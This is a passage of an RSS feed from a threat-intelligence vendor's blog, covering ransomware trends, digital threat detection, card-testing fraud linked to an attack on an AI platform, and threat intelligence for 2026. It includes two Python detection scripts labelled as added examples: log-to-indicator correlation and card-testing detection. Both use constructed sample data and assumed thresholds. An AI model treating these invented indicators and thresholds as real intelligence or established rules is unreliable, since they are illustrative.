        <h2>Trend 2: Insider recruitment attempts are accelerating</h2>
        <p>Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.</p>
        <p>The most public example came earlier this year when a ransomware group attempted to recruit a <a href="https://www.bbc.com/news/articles/c3w5n903447o">reporter at the BBC</a>. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.</li>
        </ul>
        <h2>Trend 3: Gig workers as unwitting attack vectors</h2>
        <p>According to a recent <a href="https://www.ic3.gov/CSA/2025/250523.pdf">FBI advisory</a>, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.</p>
        <p>The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.</p>
        <ul>
          <li><strong>What this means for defenders:</strong> Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.</li>
        </ul>
        <h2>Looking ahead: One big prediction for 2026</h2>
        <p>The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.</p>
        <p>Recorded Future believes that 2026 will be the first year the number of <em>new</em> ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.</p>
        <h2>The bottom line: Strengthen your ransomware defenses</h2>
        <p>Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:</p>
        <ul>
          <li><strong>Explore Recorded Future's</strong> <strong><a href="https://www.recordedfuture.com/use-case/ransomware">Ransomware Mitigation Solution</a></strong> for end-to-end visibility into your ransomware exposure across the attack lifecycle.</li>
          <li><strong>Read our latest</strong> <strong><a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group® research</a></strong> on ransomware trends, threat actor TTPs, and emerging attack vectors.</li>
          <li><strong>Download the</strong> <strong><a href="https://www.recordedfuture.com/resources/guides/proactive-ransomware-mitigation">Proactive Ransomware Mitigation eBook</a></strong> for actionable strategies to identify, investigate, and prioritize cyber threats.</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_13d33e30a4d6ff2bf805413e36ff4532517bc417e.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Digital Threat Detection Tools & Best Practices]]></title>
            <link>https://www.recordedfuture.com/blog/digital-threat-detection</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/digital-threat-detection</guid>
            <pubDate>Mon, 22 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore digital threat detection tools and learn best practices to identify, analyze, and neutralize digital threats before they impact your business.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Digital threats now originate far beyond the perimeter.</strong> Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.</li>
          <li><strong>Context is the foundation of effective detection.</strong> Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.</li>
          <li><strong>Modern digital threat detection (DTD) requires visibility across the external digital environment.</strong> The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.</li>
          <li><strong>Analysts need automation to keep pace.</strong> High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.</li>
          <li><strong>Recorded Future operationalizes intelligence at enterprise scale.</strong> The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.</li>
        </ul>
        <h2>Why Digital Threat Detection Requires a New Approach</h2>
        <p>Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:</p>
        <ul>
          <li>High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.</li>
          <li>Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.</li>
          <li>Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.</li>
          <li>Alert fatigue from manually sifting through noise to find high-risk signals.</li>
        </ul>
        <p>As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.</p>
        <p>Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.</p>
        <p>The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.</p>
        <h2>Understanding the Modern Digital Threat Landscape</h2>
        <p>To <a href="https://www.recordedfuture.com/blog/digital-risk-protection-overview">build an effective digital threat detection program</a>, security teams must understand where modern threats originate and how attackers operate.</p>
        <h3>Key Threat Vectors Beyond the Perimeter</h3>
        <h4>Leaked credentials and account takeover attempts (stolen identities)</h4>
        <p>Compromised identities are now among the most common initial access vectors. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they are exposed.</p>
        <h4>Brand impersonation, domain spoofing, and phishing campaigns</h4>
        <p>Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.</p>
        <h4>Vulnerability exploitation and zero-day threats in the external attack surface</h4>
        <p>Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.</p>
        <h4>Dark web chatter and early warning signs of planned ransomware or DDoS attacks</h4>
        <p>Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.</p>
        <h2>Why an Intelligence-Driven Approach is Better</h2>
        <p>For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.</p>
        <p>Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors, infrastructure, and intent of adversaries operating across the <a href="https://www.recordedfuture.com/blog/digital-risk-management-strategies">broader digital ecosystem</a>. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.</p>
        <p>The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.</p>
        <h2>Essential Digital Threat Detection Tools and Technologies</h2>
        <p>Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.</p>
        <h3>Threat Intelligence Platforms: The Engines of Context</h3>
        <p>No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.</p>
        <p>Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:</p>
        <ul>
          <li>Open web reporting</li>
          <li>Underground forums</li>
          <li>Dark web marketplaces</li>
          <li>Malware sandboxes</li>
          <li>Threat feeds</li>
          <li>Researcher data</li>
        </ul>
        <p>Once the data is normalized, the platform enriches it with context, such as:</p>
        <ul>
          <li>Relationships between indicators</li>
          <li>Associations with known threat actors</li>
          <li>Infrastructure reuse</li>
          <li>Activity targeting specific industries or regions</li>
        </ul>
        <p>This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.</p>
        <h3>Security Orchestration, Automation, and Response (SOAR)</h3>
        <p>While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.</p>
        <p>Key SOAR capabilities include:</p>
        <ul>
          <li><strong>Enriching alerts</strong> with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)</li>
          <li><strong>Blocking malicious indicators</strong> across firewalls, endpoints, cloud environments, and identity systems</li>
          <li><strong>Initiating takedown workflows</strong> for harmful domains or impersonation infrastructure</li>
          <li><strong>Coordinating actions</strong> across multiple security tools to ensure a unified response</li>
          <li><strong>Documenting each step</strong> of the investigation for reporting and compliance</li>
        </ul>
        <p>By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.</p>
        <h3>Endpoint Detection and Response (EDR) &amp; Security Information and Event Management (SIEM) Integration</h3>
        <p>EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.</p>
        <p>EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.</p>
        <p>Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.</p>
        <p>Modern platforms increasingly apply AI and machine learning to extend this capability. Instead of relying solely on static signatures or predefined rules, they baseline normal behavior across users and systems and flag subtle deviations that may signal compromise. A deviation is still only a candidate: it needs intelligence context to separate a real intrusion from a benign change in how a user or system behaves.</p>
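        <p>The enrichment step described under threat intelligence platforms (relationships between indicators, infrastructure reuse, actor association) and the correlation step described here (matching internal telemetry against that context) can be shown together in a small script. The following Python is an added example, not code from the original post or from Recorded Future's platform. Every indicator record, log line, field name, risk value and threshold in it is constructed for illustration: indicators are keyed by value, a domain that resolves to actor-attributed infrastructure inherits that attribution (marked as inferred) and a risk floor, and sample key=value log lines are then scanned so each hit carries the actor, the related indicators and a priority derived from the risk score.</p>

```python
import re
from collections import defaultdict

# Risk floor applied when attribution is inferred from infrastructure reuse.
# This value is an assumption for the example, not a published scoring rule.
INFERRED_RISK_FLOOR = 65

# Constructed indicator records (illustrative only, not real intelligence).
INDICATORS = [
    {"value": "203.0.113.45", "type": "ip", "actor": "ACTOR-A",
     "campaign": "credential-phishing", "risk": 92},
    {"value": "login-example-corp.net", "type": "domain", "actor": "ACTOR-A",
     "campaign": "credential-phishing", "risk": 88, "resolves_to": "203.0.113.45"},
    # Low-scored on its own, but shares hosting with ACTOR-A infrastructure.
    {"value": "cdn-updates.example", "type": "domain", "actor": None,
     "campaign": None, "risk": 35, "resolves_to": "203.0.113.45"},
    {"value": "198.51.100.7", "type": "ip", "actor": None,
     "campaign": None, "risk": 20},
]

# Constructed log lines in a simple key=value format (not a real SIEM schema).
SAMPLE_LOGS = """\
2025-12-01T08:00:01Z source=auth user=alice src=10.0.0.5 result=success
2025-12-01T08:00:03Z source=auth user=bob src=203.0.113.45 result=failure
2025-12-01T08:00:04Z source=dns client=10.0.0.9 query=cdn-updates.example
2025-12-01T08:00:09Z source=proxy user=carol dst=login-example-corp.net status=200
2025-12-01T08:00:10Z source=auth user=bob src=198.51.100.7 result=success
"""

KV = re.compile(r"(\w+)=(\S+)")


def build_context(indicators):
    """Index indicators by value and add relationships derived from infrastructure reuse."""
    ctx = {i["value"]: dict(i, related=set()) for i in indicators}
    hosted_on = defaultdict(list)
    for ind in ctx.values():
        if ind.get("resolves_to"):
            hosted_on[ind["resolves_to"]].append(ind["value"])
    for ip, domains in hosted_on.items():
        members = [ip] + domains
        # Indicators in this cluster that already carry an actor attribution.
        attributed = [ctx[m] for m in members if m in ctx and ctx[m]["actor"]]
        for value in members:
            if value not in ctx:
                continue
            ind = ctx[value]
            ind["related"].update(m for m in members if m != value)
            # A domain hosted on actor-attributed infrastructure inherits the
            # attribution, flagged as inferred, and a floor on its risk score.
            if ind["actor"] is None and attributed:
                ind["actor"] = attributed[0]["actor"]
                ind["campaign"] = attributed[0]["campaign"]
                ind["inferred"] = True
                ind["risk"] = max(ind["risk"], INFERRED_RISK_FLOOR)
    return ctx


def priority(risk):
    """Map a numeric risk score to a triage bucket (thresholds are assumptions)."""
    if risk >= 80:
        return "high"
    if risk >= 50:
        return "medium"
    return "low"


def correlate(log_text, ctx):
    """Match network fields of each log line against the indicator context.

    Returns one alert per indicator hit, highest risk first, carrying the
    context an analyst needs to decide whether to escalate.
    """
    alerts = []
    for line in log_text.splitlines():
        fields = dict(KV.findall(line))
        timestamp = line.split(" ", 1)[0]
        for key in ("src", "dst", "query"):
            hit = ctx.get(fields.get(key))
            if hit is None:
                continue
            alerts.append({
                "timestamp": timestamp,
                "source": fields.get("source"),
                "indicator": hit["value"],
                "risk": hit["risk"],
                "actor": hit["actor"],
                "inferred": hit.get("inferred", False),
                "priority": priority(hit["risk"]),
                "related": sorted(hit["related"]),
            })
    return sorted(alerts, key=lambda a: -a["risk"])


if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOGS, build_context(INDICATORS)):
        print(alert["priority"], alert["timestamp"], alert["source"],
              alert["indicator"], alert["actor"], alert["related"])
```

        <p>The point of the inferred-attribution step is the one the text makes about context: the DNS query for the low-scored domain would be ignored on its own, but because the domain sits on the same host as the actor's phishing infrastructure it surfaces as a medium-priority alert linked to the same campaign as the high-priority authentication failure.</p>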
        <h2>Overcoming the Analyst’s Biggest Pain Points</h2>
        <p>Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.</p>
        <h3>The Drain of Alert Fatigue and False Positives</h3>
        <p>High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.</p>
        <p>The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.</p>
        <h3>The Blind Spots of External Risk</h3>
        <p>Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.</p>
        <p>These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.</p>
        <h2>Recorded Future: Operationalizing Digital Threat Intelligence at Scale</h2>
        <p>Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.</p>
        <h3>Real-Time Context from the Intelligence GraphⓇ</h3>
        <p><a href="https://www.recordedfuture.com/platform/intelligence-graph">The Intelligence GraphⓇ</a> addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:</p>
        <ul>
          <li>Open web</li>
          <li>Dark web marketplaces</li>
          <li>Malware repositories</li>
          <li>Technical feeds</li>
          <li>Network telemetry</li>
          <li>Closed underground forums</li>
        </ul>
        <p>No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.</p>
        <h3>Comprehensive Digital Risk Protection for External Threats</h3>
        <p>Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.</p>
        <p>Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.</p>
        <h3>Accelerating Time-to-Action through Integrated Intelligence</h3>
        <p>Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.</p>
        <p>An extensive ecosystem of pre-built integrations and flexible APIs connects directly with major SIEM, SOAR, and EDR platforms. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.</p>
        <p>Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.</p>
        <p>This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&amp;CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.</p>
        <h3>Smarter, Faster Security Decisions</h3>
        <p>Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.</p>
        <p>By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.</p>
        <p>These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.</p>
        <p>Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how <a href="https://www.recordedfuture.com/use-case/digital-risk">Recorded Future</a> can support your Digital Threat Detection strategy.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_14639da492947ba40cd78b2b341750064fc2e01ca.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The $0 Transaction That Signaled a Nation-State Cyberattack]]></title>
            <link>https://www.recordedfuture.com/blog/transaction-that-signaled-nation-state-cyberattack</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/transaction-that-signaled-nation-state-cyberattack</guid>
            <pubDate>Wed, 17 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A $0 card test signaled a Chinese state-linked cyberattack on Anthropic’s AI platform. Learn how card-testing fraud intelligence spots nation-state ops early.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Points:</h2>
              <ul>
                <li>Fraud enables cyber operations: Threat actors used compromised payment cards validated through Chinese-operated card-testing services to attempt unauthorized access to Anthropic's AI platform during a reported state-sponsored espionage campaign.</li>
                <li><a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Card testing</a> signals downstream attacks: The observed fraud followed a predictable kill chain—compromise, validation, resale, and attempted cashout—providing early warning <a href="https://www.recordedfuture.com/threat-intelligence-101/intelligence-sources-collection/threat-intelligence-feeds">indicators</a> that preceded the final malicious transaction.</li>
                <li>Recorded Future’s take: Proactive fraud intelligence prevents broader threats. Tester merchant intelligence can identify compromised cards before they're used for high-value fraud or to support advanced threat actor operations.</li>
              </ul>
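              <p>The kill chain in the second point (compromise, validation, resale, attempted cashout) can be turned into a detection. The following Python is an added example, not code from the original post or from Recorded Future's payment fraud product. The authorization records, merchant and card identifiers, time window and thresholds are all constructed for illustration: a merchant that pushes many distinct cards through near-zero-value authorizations within a short window is flagged as a tester, the cards that were approved there are treated as validated, and any later non-zero authorization on those cards at a different merchant is surfaced as a downstream use, which is the early-warning signal the article describes.</p>

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authorization records (illustrative, not real transaction data).
# Fields: timestamp, merchant_id, card (tokenised), amount in USD, approved.
AUTHS = [
    ("2025-12-01T02:00:00Z", "M-TEST-1", "card-001", 0.00, True),
    ("2025-12-01T02:00:02Z", "M-TEST-1", "card-002", 0.00, False),
    ("2025-12-01T02:00:03Z", "M-TEST-1", "card-003", 0.00, True),
    ("2025-12-01T02:00:05Z", "M-TEST-1", "card-004", 0.00, False),
    ("2025-12-01T02:00:06Z", "M-TEST-1", "card-005", 0.00, True),
    ("2025-12-01T02:00:07Z", "M-TEST-1", "card-006", 0.00, True),
    ("2025-12-01T09:15:00Z", "M-SHOP-9", "card-001", 59.99, True),  # tested card, retail use
    ("2025-12-01T09:16:00Z", "M-SHOP-9", "card-777", 12.50, True),  # never tested
    ("2025-12-02T11:00:00Z", "M-AI-SVC", "card-003", 20.00, True),  # tested card, cashout attempt
    ("2025-12-02T11:01:00Z", "M-AI-SVC", "card-005", 20.00, False),
]


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_tester_merchants(auths, window=timedelta(minutes=5), min_cards=5, max_amount=1.00):
    """Flag merchants that run many distinct low-value authorizations in a short window.

    Returns {merchant_id: set of cards that were approved during the burst}.
    The window, card count and amount ceiling are assumptions for the example,
    not a published detection rule.
    """
    by_merchant = defaultdict(list)
    for ts, merchant, card, amount, approved in auths:
        if amount <= max_amount:
            by_merchant[merchant].append((parse_ts(ts), card, approved))
    flagged = {}
    for merchant, events in by_merchant.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window so events[start:end+1] spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            burst = events[start:end + 1]
            if len({card for _, card, _ in burst}) >= min_cards:
                validated = {card for _, card, ok in burst if ok}
                flagged.setdefault(merchant, set()).update(validated)
    return flagged


def downstream_uses(auths, flagged):
    """Later non-zero authorizations, at other merchants, on cards a tester validated."""
    watch = {card: merchant for merchant, cards in flagged.items() for card in cards}
    hits = []
    for ts, merchant, card, amount, approved in auths:
        if card in watch and merchant != watch[card] and amount > 0:
            hits.append({"timestamp": ts, "merchant": merchant, "card": card,
                         "amount": amount, "approved": approved,
                         "tested_at": watch[card]})
    return sorted(hits, key=lambda h: h["timestamp"])


if __name__ == "__main__":
    testers = find_tester_merchants(AUTHS)
    for merchant, cards in testers.items():
        print("tester merchant", merchant, "validated", sorted(cards))
    for hit in downstream_uses(AUTHS, testers):
        print("downstream use", hit["timestamp"], hit["merchant"], hit["card"], hit["amount"])
```

              <p>Declined cards (card-002, card-004) are deliberately left out of the watch list: the actor only resells cards that passed validation, so those are the ones worth alerting on when they reappear. In practice the watch list from this step is what would be pushed to the issuer or to a fraud-intelligence feed so the cashout at the third merchant is blocked rather than merely observed.</p>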
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1b69b3987107eb35b9673377e1cac520995d23f77.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[What’s Next for Enterprise Threat Intelligence in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/whats-next-for-enterprise-threat-intelligence-in-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/whats-next-for-enterprise-threat-intelligence-in-2026</guid>
            <pubDate>Mon, 15 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Top enterprise threat intelligence trends for 2026: AI-augmented CTI, unified platforms, workflow integration, data fusion, budgets, ROI, and maturity.]]></description>
            <content:encoded><![CDATA[
        <h2>Introduction</h2>
        <p>The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.</p>
        <p>The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">2025 State of Threat Intelligence Report</a> found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.</p>
        <p>This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.</p>
        <p>Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.</p>
        <h2>Key Trends Driving Threat Intelligence Evolution</h2>
        <p>There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.</p>
        <ul>
          <li><strong>Vendor Consolidation for Unified Intelligence:</strong> Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.</li>
          <li><strong>Deeper Integration into Security Workflows:</strong> Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.</li>
          <li><strong>Automation and AI Augmentation:</strong> To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.</li>
          <li><strong>Fusion of Internal and External Data:</strong> Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).</li>
        </ul>
        <h2>Challenges Holding Teams Back Today</h2>
        <p>Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.</p>
        <ul>
          <li><strong>Integration Gaps:</strong> Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.</li>
          <li><strong>Credibility and Trust Issues:</strong> Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.</li>
          <li><strong>Signal-to-Noise Overload:</strong> With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.</li>
          <li><strong>Lack of Context for Action:</strong> Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.</li>
        </ul>
        <p>These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.</p>
        <h2>Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned</h2>
        <p>In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).</p>
        <p>Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.</p>
        <p>Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.</p>
        <p>Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.</p>
        <h2>Implications for 2026 Security Budgets and Investments</h2>
        <p>As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.</p>
        <p>One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.</p>
        <p>Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.</p>
        <div>
          <div>
            <div>After integrating Recorded Future into our Cyber Threat Intelligence (CTI) workflow… We reduced detection time by 40%, from an average of 48 hours to 28 hours. Incident response efficiency improved by 30%, as automated enrichment from Recorded Future replaced manual intelligence gathering. We also identified and mitigated 25% more threats compared to the previous quarter.</div>
          </div>
          <div>
            <div><strong>Cyber Threat Intelligence Specialist, Large Enterprise Professional Services Company</strong></div>
          </div>
        </div>
        <p>Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.</p>
        <p>That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.</p>
        <p>Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.</p>
        <h2>Charting the Course to 2026</h2>
        <p>Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.</p>
        <p>By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.</p>
